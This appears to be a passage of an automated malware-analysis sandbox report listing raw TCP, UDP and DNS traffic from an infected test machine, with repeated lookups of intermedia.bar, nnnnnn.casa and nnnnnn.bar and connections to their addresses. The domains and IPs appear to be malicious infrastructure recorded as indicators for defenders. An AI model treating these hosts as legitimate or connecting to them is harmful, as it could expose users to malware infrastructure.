                  Jan 21, 2022 07:54:47.258203030 CET8049883198.54.117.212192.168.2.3
                  Jan 21, 2022 07:54:47.258363008 CET4988380192.168.2.3198.54.117.212
                  Jan 21, 2022 07:54:47.258850098 CET4988380192.168.2.3198.54.117.212
                  Jan 21, 2022 07:54:47.421822071 CET8049883198.54.117.212192.168.2.3
                  Jan 21, 2022 07:54:47.421909094 CET8049883198.54.117.212192.168.2.3
                  Jan 21, 2022 07:54:47.479036093 CET4988480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:47.638875961 CET8049884192.64.119.233192.168.2.3
                  Jan 21, 2022 07:54:47.638995886 CET4988480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:47.639854908 CET4988480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:47.799814939 CET8049884192.64.119.233192.168.2.3
                  Jan 21, 2022 07:54:49.835479975 CET8049884192.64.119.233192.168.2.3
                  Jan 21, 2022 07:54:49.835613966 CET4988480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:49.864048958 CET4988580192.168.2.3198.54.117.215
                  Jan 21, 2022 07:54:50.027051926 CET8049885198.54.117.215192.168.2.3
                  Jan 21, 2022 07:54:50.027220964 CET4988580192.168.2.3198.54.117.215
                  Jan 21, 2022 07:54:50.027798891 CET4988580192.168.2.3198.54.117.215
                  Jan 21, 2022 07:54:50.190757036 CET8049885198.54.117.215192.168.2.3
                  Jan 21, 2022 07:54:50.190799952 CET8049885198.54.117.215192.168.2.3
                  Jan 21, 2022 07:54:52.054985046 CET8049882192.64.119.233192.168.2.3
                  Jan 21, 2022 07:54:52.055094957 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:54.835763931 CET8049884192.64.119.233192.168.2.3
                  Jan 21, 2022 07:54:54.835859060 CET4988480192.168.2.3192.64.119.233
                  Jan 21, 2022 07:54:55.569597960 CET4987780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:56.429752111 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:03.023731947 CET4987680192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:03.306742907 CET4987580192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:07.521276951 CET4988680192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:07.580790043 CET804988631.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:07.580892086 CET4988680192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:07.581451893 CET4988680192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:07.640754938 CET804988631.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:07.640822887 CET804988631.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:07.640909910 CET4988680192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:07.640986919 CET4988680192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:07.699948072 CET804988631.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:10.309474945 CET4988780192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:10.370079994 CET804988731.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:10.370210886 CET4988780192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:10.371342897 CET4988780192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:10.431581020 CET804988731.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:10.431617022 CET804988731.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:10.431718111 CET4988780192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:10.432034016 CET4988780192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:10.492327929 CET804988731.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:18.820615053 CET4988880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:18.980526924 CET8049888192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:18.980712891 CET4988880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:18.981075048 CET4988880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.140808105 CET8049888192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:19.141344070 CET8049888192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:19.141494989 CET4988880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.142827988 CET4988980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.176912069 CET4989080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:55:19.302623987 CET8049889192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:19.302845001 CET4988980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.304620981 CET4988980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.340059042 CET8049890198.54.117.210192.168.2.3
                  Jan 21, 2022 07:55:19.340167046 CET4989080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:55:19.340749979 CET4989080192.168.2.3198.54.117.210
                  Jan 21, 2022 07:55:19.464427948 CET8049889192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:19.464982033 CET8049889192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:19.465080023 CET4988980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:19.500292063 CET4989180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:55:19.503846884 CET8049890198.54.117.210192.168.2.3
                  Jan 21, 2022 07:55:19.503887892 CET8049890198.54.117.210192.168.2.3
                  Jan 21, 2022 07:55:19.660401106 CET8049891198.54.117.216192.168.2.3
                  Jan 21, 2022 07:55:19.660592079 CET4989180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:55:19.661740065 CET4989180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:55:19.821891069 CET8049891198.54.117.216192.168.2.3
                  Jan 21, 2022 07:55:19.821949959 CET8049891198.54.117.216192.168.2.3
                  Jan 21, 2022 07:55:24.141338110 CET8049888192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:24.141613007 CET4988880192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:24.464871883 CET8049889192.64.119.233192.168.2.3
                  Jan 21, 2022 07:55:24.465073109 CET4988980192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:27.769408941 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.532588959 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.692522049 CET8049893162.255.119.177192.168.2.3
                  Jan 21, 2022 07:55:30.692753077 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.693897963 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.760468960 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.920306921 CET8049892162.255.119.177192.168.2.3
                  Jan 21, 2022 07:55:30.920542955 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:30.921610117 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:31.135282040 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:31.228916883 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:31.541513920 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:31.666309118 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:32.116229057 CET8049892162.255.119.177192.168.2.3
                  Jan 21, 2022 07:55:32.116343021 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:32.150764942 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:32.635396957 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:33.354209900 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:34.557248116 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:35.760483980 CET4989280192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:35.920517921 CET8049892162.255.119.177192.168.2.3
                  Jan 21, 2022 07:55:38.385730028 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:39.586354971 CET4989480192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:39.650441885 CET804989431.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:39.650605917 CET4989480192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:39.651832104 CET4989480192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:39.716144085 CET804989431.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:39.716593981 CET804989431.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:39.716677904 CET4989480192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:39.716845989 CET4989480192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:39.780419111 CET804989431.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:40.001171112 CET4989580192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:40.061669111 CET804989531.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:40.061842918 CET4989580192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:40.062398911 CET4989580192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:40.122631073 CET804989531.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:40.122669935 CET804989531.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:40.122787952 CET4989580192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:40.122895956 CET4989580192.168.2.331.41.46.120
                  Jan 21, 2022 07:55:40.182869911 CET804989531.41.46.120192.168.2.3
                  Jan 21, 2022 07:55:46.042517900 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:55.950710058 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:55.954690933 CET4989680192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:56.418414116 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:57.262398005 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:58.934288025 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:58.965468884 CET4989680192.168.2.3192.64.119.233
                  Jan 21, 2022 07:55:59.795084000 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:59.954768896 CET8049897162.255.119.177192.168.2.3
                  Jan 21, 2022 07:55:59.954933882 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:55:59.956077099 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.240942955 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.387495995 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.400808096 CET8049898162.255.119.177192.168.2.3
                  Jan 21, 2022 07:56:00.400984049 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.402211905 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.840862036 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:00.903311968 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:01.340732098 CET4989380192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:01.387602091 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:01.856380939 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:02.278336048 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:56:02.387679100 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:03.747212887 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:04.387835979 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:04.965982914 CET4989680192.168.2.3192.64.119.233
                  Jan 21, 2022 07:56:07.528678894 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:08.372697115 CET4989880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:08.966317892 CET4988280192.168.2.3192.64.119.233
                  Jan 21, 2022 07:56:15.077811956 CET4989780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:56:16.326375961 CET4989880192.168.2.3162.255.119.177

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 21, 2022 07:52:31.536573887 CET5787553192.168.2.38.8.8.8
                  Jan 21, 2022 07:52:31.554512024 CET53578758.8.8.8192.168.2.3
                  Jan 21, 2022 07:52:33.055603981 CET5415453192.168.2.38.8.8.8
                  Jan 21, 2022 07:52:33.063489914 CET5280653192.168.2.38.8.8.8
                  Jan 21, 2022 07:52:33.073617935 CET53541548.8.8.8192.168.2.3
                  Jan 21, 2022 07:52:33.079840899 CET53528068.8.8.8192.168.2.3
                  Jan 21, 2022 07:52:33.105743885 CET5391053192.168.2.38.8.8.8
                  Jan 21, 2022 07:52:33.123266935 CET53539108.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:18.026475906 CET6329753192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:18.046252012 CET53632978.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:20.502280951 CET5836153192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:20.505213022 CET5361553192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:20.508810043 CET5072853192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:20.526889086 CET53536158.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:20.526930094 CET53507288.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:20.559519053 CET53583618.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:22.058412075 CET5710653192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:22.078999996 CET6035253192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:22.081625938 CET53571068.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:22.100311995 CET53603528.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:23.927560091 CET5677353192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:23.933923960 CET6098253192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:23.951951981 CET53567738.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:23.956944942 CET53609828.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:51.772736073 CET5153953192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:51.791054010 CET53515398.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:53.018518925 CET5539353192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:53.027496099 CET5058553192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:53.036653996 CET53553938.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:53.045314074 CET53505858.8.8.8192.168.2.3
                  Jan 21, 2022 07:53:53.051220894 CET6345653192.168.2.38.8.8.8
                  Jan 21, 2022 07:53:53.069173098 CET53634568.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:16.158632994 CET5510853192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:16.180954933 CET53551088.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:19.748878002 CET5894253192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:19.784967899 CET53589428.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:21.350162983 CET6443253192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:21.366064072 CET4925053192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:21.367357969 CET53644328.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:21.385416031 CET6349053192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:21.389899015 CET53492508.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:21.405597925 CET53634908.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:24.293394089 CET6511053192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:24.313271046 CET53651108.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:43.969847918 CET6112053192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:43.993266106 CET53611208.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:47.070692062 CET5082453192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:47.093403101 CET53508248.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:47.448050976 CET5670653192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:47.464580059 CET53567068.8.8.8192.168.2.3
                  Jan 21, 2022 07:54:49.845648050 CET5356953192.168.2.38.8.8.8
                  Jan 21, 2022 07:54:49.862381935 CET53535698.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:07.503159046 CET6550153192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:07.519746065 CET53655018.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:10.290509939 CET5346553192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:10.306759119 CET53534658.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:18.790206909 CET4929053192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:18.808697939 CET53492908.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:19.111947060 CET5975453192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:19.131164074 CET53597548.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:19.151851892 CET4923453192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:19.172622919 CET53492348.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:19.473258972 CET5872053192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:19.491530895 CET53587208.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:27.745961905 CET5744753192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:27.767707109 CET53574478.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:30.511321068 CET6358353192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:30.529737949 CET53635838.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:39.566582918 CET6409953192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:39.584458113 CET53640998.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:39.977742910 CET6461053192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:39.996416092 CET53646108.8.8.8192.168.2.3
                  Jan 21, 2022 07:55:59.773462057 CET5198953192.168.2.38.8.8.8
                  Jan 21, 2022 07:55:59.791659117 CET53519898.8.8.8192.168.2.3
                  Jan 21, 2022 07:56:00.202368975 CET5315253192.168.2.38.8.8.8
                  Jan 21, 2022 07:56:00.223572969 CET53531528.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 21, 2022 07:52:31.536573887 CET192.168.2.38.8.8.80xa2f1Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.055603981 CET192.168.2.38.8.8.80xda26Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.063489914 CET192.168.2.38.8.8.80xf7e3Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.105743885 CET192.168.2.38.8.8.80x1853Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:18.026475906 CET192.168.2.38.8.8.80x1716Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.502280951 CET192.168.2.38.8.8.80x5ee6Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.505213022 CET192.168.2.38.8.8.80x342fStandard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.508810043 CET192.168.2.38.8.8.80x39f3Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.058412075 CET192.168.2.38.8.8.80x32fdStandard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.078999996 CET192.168.2.38.8.8.80x5969Standard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.927560091 CET192.168.2.38.8.8.80x7f98Standard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.933923960 CET192.168.2.38.8.8.80xd103Standard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:51.772736073 CET192.168.2.38.8.8.80xfbe3Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.018518925 CET192.168.2.38.8.8.80x7978Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.027496099 CET192.168.2.38.8.8.80x665bStandard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.051220894 CET192.168.2.38.8.8.80x7d04Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:16.158632994 CET192.168.2.38.8.8.80xbebbStandard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.748878002 CET192.168.2.38.8.8.80x946Standard query (0)www.nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.350162983 CET192.168.2.38.8.8.80xdd79Standard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.366064072 CET192.168.2.38.8.8.80x50bbStandard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.385416031 CET192.168.2.38.8.8.80x730cStandard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.293394089 CET192.168.2.38.8.8.80xb57fStandard query (0)www.nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:43.969847918 CET192.168.2.38.8.8.80x9f6bStandard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.070692062 CET192.168.2.38.8.8.80xcaacStandard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.448050976 CET192.168.2.38.8.8.80x37e1Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.845648050 CET192.168.2.38.8.8.80xf154Standard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:07.503159046 CET192.168.2.38.8.8.80xe76cStandard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:10.290509939 CET192.168.2.38.8.8.80x35b1Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:18.790206909 CET192.168.2.38.8.8.80xe7d2Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.111947060 CET192.168.2.38.8.8.80x5cd7Standard query (0)nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.151851892 CET192.168.2.38.8.8.80xa9cdStandard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.473258972 CET192.168.2.38.8.8.80x7631Standard query (0)www.nnnnnn.casaA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:27.745961905 CET192.168.2.38.8.8.80xa700Standard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:30.511321068 CET192.168.2.38.8.8.80x1ddaStandard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.566582918 CET192.168.2.38.8.8.80xc787Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.977742910 CET192.168.2.38.8.8.80x5086Standard query (0)intermedia.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:59.773462057 CET192.168.2.38.8.8.80xd45dStandard query (0)nnnnnn.barA (IP address)IN (0x0001)
                  Jan 21, 2022 07:56:00.202368975 CET192.168.2.38.8.8.80xa3b2Standard query (0)nnnnnn.barA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 21, 2022 07:52:31.554512024 CET8.8.8.8192.168.2.30xa2f1No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.073617935 CET8.8.8.8192.168.2.30xda26No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.079840899 CET8.8.8.8192.168.2.30xf7e3No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:52:33.123266935 CET8.8.8.8192.168.2.30x1853No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:18.046252012 CET8.8.8.8192.168.2.30x1716No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.526889086 CET8.8.8.8192.168.2.30x342fNo error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.526930094 CET8.8.8.8192.168.2.30x39f3No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:20.559519053 CET8.8.8.8192.168.2.30x5ee6No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.081625938 CET8.8.8.8192.168.2.30x32fdNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:22.100311995 CET8.8.8.8192.168.2.30x5969No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.951951981 CET8.8.8.8192.168.2.30x7f98No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
